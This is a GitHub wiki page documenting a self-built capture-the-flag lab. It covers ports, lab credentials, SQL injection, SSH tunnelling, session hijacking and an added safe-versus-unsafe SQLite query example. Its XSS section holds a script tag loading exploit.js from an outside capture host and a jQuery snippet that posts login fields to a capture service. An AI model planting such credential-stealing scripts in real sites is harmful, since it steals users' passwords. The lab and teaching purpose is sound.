Home - mattharley/phonypictures-ctf GitHub Wiki

Welcome to the phonypictures-ctf wiki!

Architecture & Ports

Ubuntu VM (e.g. 192.168.59.104)
22 - SSH
7000 - LinkedOut
8000 - Amazone

hero / zer02her0 - what I used to create everything
nerdy / l33t - use for ssh

Docker (e.g. 172.17.42.1)
5000 - Intranet Forum 
5001 - Capture - POST username,password to write to the page
5002 - SSH 

root / b!gb0ss

[SQL Injection](SQL Injection)

The Amazone.com website. Need to extract the IT guy's username and password. Very simple SQL database with products and users tables. The search field doesn't sanitise its input before running:

SELECT * FROM products WHERE name LIKE "blah";
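Added example (not code from the CTF's own Amazone app): the search above, written both the way the wiki describes it (user input spliced straight into the SQL text) and with a bound parameter plus LIKE-wildcard escaping. The products table and rows are constructed sample data, the query uses single quotes so SQLite treats the term as a string literal, and the names of the functions are my own.

```python
import sqlite3

# Constructed sample catalogue standing in for the Amazone products table.
SAMPLE_PRODUCTS = [
    (1, "Phony Camera", 199.0),
    (2, "O'Reilly Book", 25.0),
    (3, "Phony Lens", 99.0),
]


def make_db():
    """In-memory SQLite database with the sample products loaded."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def search_vulnerable(conn, term):
    """Mirrors the wiki's query: the term is pasted into the statement, so a
    quote inside it changes the SQL itself, and '%' or '_' act as wildcards."""
    sql = f"SELECT * FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened form: the term is passed as a bound parameter (data, never SQL)
    and LIKE metacharacters are escaped so they match literally."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT * FROM products WHERE name LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


def vulnerable_rejects(conn, term):
    """True when the spliced query is no longer valid SQL for this term,
    i.e. the input escaped the string literal. A legitimate product name
    with an apostrophe is enough to trigger it."""
    try:
        search_vulnerable(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("safe 'Phony':", search_safe(db, "Phony"))
    print("safe O'Reilly:", search_safe(db, "O'Reilly"))
    print("safe '%':", search_safe(db, "%"))
    print("vulnerable '%':", search_vulnerable(db, "%"))
    print("vulnerable breaks on O'Reilly:", vulnerable_rejects(db, "O'Reilly"))
```

The same apostrophe that breaks the spliced query is handled as plain data by the parameterised one, and a bare `%` matches everything in the vulnerable search but nothing in the escaped one.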

Steps to get all usernames and passwords

SSH Tunnel into the private intranet

Use the IT guy's password to open an SSH tunnel into the company intranet.

ssh -f [email protected] -L 5000:172.17.42.1:5000 -N
ssh -f [email protected] -L 5001:172.17.42.1:5001 -N

and to kill

ps aux | grep 5000
kill XXXXX

XSS (Persistent)

Get the boss's password from the Intranet site. The Company Intranet site has a forum page. Posting new items to the page does not strip HTML/JS tags. Can insert:

<script type="text/javascript" src="https://phony-capture.herokuapp.com/static/exploit.js"></script>

or some arbitrary script which uses jQuery to read the username/password fields of the login form.

All of the login attempts are then logged at https://phony-capture.herokuapp.com/, and the credentials of other people logging in (e.g. the Boss) are captured automatically once the first post is successful.

Steps to inject XSS attack into the forum page

<script type="text/javascript">
    // something like:
    $(function() {
        $("#submit").click(function() {
           // read the login form fields before the page submits
           var data = {
              username: $("#username").val(),
              password: $("#password").val()
           };
           //alert("Just posted username: " + data.username + " password: " + data.password);
           // send them to the Capture service (port 5001); the response is ignored
           $.post("http://172.17.42.1:5001", data, function(posted_data, status) {
           });
        });
    });
</script>

Packet Sniffing & Session Hijacking

Watch passing traffic (with something like Wireshark). Find a session cookie for FaceBlerg.com. Use a proxy (like Burp Proxy) or Postman (Chrome) to inject this cookie into our session.

Social Engineering

  • Emails?
  • Static Page
  • Boss Bossington (Executive VP)
  • Nerdy McNerd (IT Guy)
  • Hero (Hacker and graduate)
  • Shy Introvert (Personal Assistant to Boss)

VirtualBox

Choose Host-Only Adapter

# get all of the virtual machines on your host:
VBoxManage list vms

# find ip address of our ctf machine
VBoxManage --nologo guestproperty get "Ubuntu 15 Clean" /VirtualBox/GuestInfo/Net/0/V4/IP

SSH

hero
zer02her0
nerdy
l33t

Selenium

DON'T CALL YOUR PYTHON FILE selenium.py !!!! (it shadows the real selenium package when you import it)

SSH

root
b!gb0ss
ssh -p 5002 [email protected]